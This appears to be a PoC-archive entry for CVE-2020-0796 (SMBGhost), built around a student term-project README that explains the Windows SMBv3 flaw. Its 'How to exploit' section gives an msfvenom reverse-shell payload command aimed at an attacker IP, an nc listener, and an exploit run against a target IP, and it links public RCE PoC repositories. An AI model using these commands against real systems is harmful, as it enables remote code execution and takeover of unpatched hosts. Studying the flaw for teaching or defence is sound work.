PoC details: 8bf5791b0fada9e8d07b482f915e21e8678c1e6f

Source
Related vulnerability
Title: Microsoft SMBv3 buffer error vulnerability (CVE-2020-0796)
Description: Microsoft SMBv3 is a piece of support firmware from Microsoft (USA) that provides SMB functionality for devices. A buffer error vulnerability exists in Microsoft Server Message Block 3.1.1 (SMBv3); it arises because the SMBv3 protocol enters an incorrect code path when handling malicious compressed packets. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code in the application. The following products and versions are affected: Microsoft Windows 10 version 1903, Windows Server version 1903, Windows 10 version 1909, Windo
Description
Explanation of CVE-2020-0796 and vulnerability research for the CENG325 term project
Introduction
# CVE-2020-0796
Explanation of CVE-2020-0796 and vulnerability research for the CENG325 term project, written for beginners

# How to exploit?

User payload generation for the reverse shell:

> msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python

Listener on the chosen port:
> nc -lvnp 5555

Exploit code execution:

> python3 exploit.py -ip TARGET_IP

# PoC Repos
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/ollypwn/SMBGhost

# Project Members
- [ezginurr](https://github.com/ezginurr)
- [zehrosh](https://github.com/zehrosh)
- [busracagliyan](https://github.com/busracagliyan)
File snapshot

```
[4.0K] /data/pocs/8bf5791b0fada9e8d07b482f915e21e8678c1e6f
├── [292K] CENG325TermProject-Final Report.pdf
├── [5.0M] demo.mp4
└── [1.6K] README.md

0 directories, 3 files
```